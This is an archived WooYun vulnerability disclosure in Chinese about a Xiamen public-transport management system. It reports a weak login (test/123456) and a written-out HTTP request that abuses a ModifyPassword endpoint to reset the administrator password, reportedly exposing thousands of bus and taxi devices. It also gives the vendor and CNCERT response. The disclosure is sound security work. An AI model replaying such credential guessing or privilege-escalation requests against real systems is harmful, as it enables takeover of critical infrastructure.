厦门市某交通系统弱口令/越权操作(影响数千辆公交出租车/内网中数据交换中心等多个系统)

2017年4月17日12:31:33评论287 views字数 268阅读0分53秒阅读模式

摘要

2016-02-27：细节已通知厂商并且等待厂商处理中
2016-03-02：厂商已经确认，细节仅向厂商公开
2016-03-12：细节向核心白帽子及相关领域专家公开
2016-03-22：细节向普通白帽子公开
2016-04-01：细节向实习白帽子公开
2016-04-16：细节向公众公开

漏洞概要关注数(0) 关注此漏洞

缺陷编号： WooYun-2016-178971

漏洞标题：厦门市某交通系统弱口令/越权操作(影响数千辆公交出租车/内网中数据交换中心等多个系统)

漏洞作者：路人甲

提交时间： 2016-02-27 11:40

公开时间： 2016-04-16 10:27

漏洞类型：后台弱口令

危害等级：高

自评Rank： 12

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：弱口令安全意识不足越权操作安全意识不足

0人收藏

漏洞详情

披露状态：

简要描述：

数千辆公交出租车等受影响

详细说明：

code 区域

http://**.**.**.**:8080/
 http://**.**.**.**:8080/
 http://**.**.**.**:8080/
 http://**.**.**.**:8080
 http://**.**.**.**:8080/

test/123456

影响2000+公交车，3700+出租车，和200余BRT车载设备

这个界面具有增删设备功能

多个设备的内网ip泄露

漏洞证明：

经过测试发现网站还存在越权操作，可直接重置管理员密码，由于刚开始不知道管理员密码，所以重置为了111111

code 区域

GET /Ajax.aspx?Invoke=ModifyPassword&UserId=admin(此处直接修改为管理员名称)&OldPass=123456&NewPass=111111 HTTP/1.1
 Host: **.**.**.**:8080
 Cache-Control: no-cache
 Accept: */*
 X-Requested-With: XMLHttpRequest
 If-Modified-Since: 0
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.154 Safari/537.36 LBBROWSER
 Referer: http://**.**.**.**:8080/ModifyPassword.aspx
 Accept-Encoding: gzip, deflate, sdch
 Accept-Language: zh-CN,zh;q=0.8
 Cookie: ASP.NET_SessionId=zflk5l55qcmxw155vgdb2422; ggpt_manage_user=test

登陆成功

管理员可以对公交车，出租车等车载设备进行远程增删处置之外还可以对内网中的数据中心，应用系统等进行编辑或删除处置，会严重影响到公共交通的秩序

修复方案：

修改弱口令，发现这个站点用户有多个，相信不只是这一个弱口令

锁定数据，防止越权操作

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2016-03-02 10:27

厂商回复：

CNVD确认并复现所述情况,已经转由CNCERT下发给福建分中心,由其后续协调网站管理单位处置.

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞概要 关注数(0) 关注此漏洞

缺陷编号： WooYun-2016-178971

漏洞标题： 厦门市某交通系统弱口令/越权操作(影响数千辆公交出租车/内网中数据交换中心等多个系统)

相关厂商： 厦门市交通运输局

漏洞作者： 路人甲

提交时间： 2016-02-27 11:40

公开时间： 2016-04-16 10:27

漏洞类型： 后台弱口令

危害等级： 高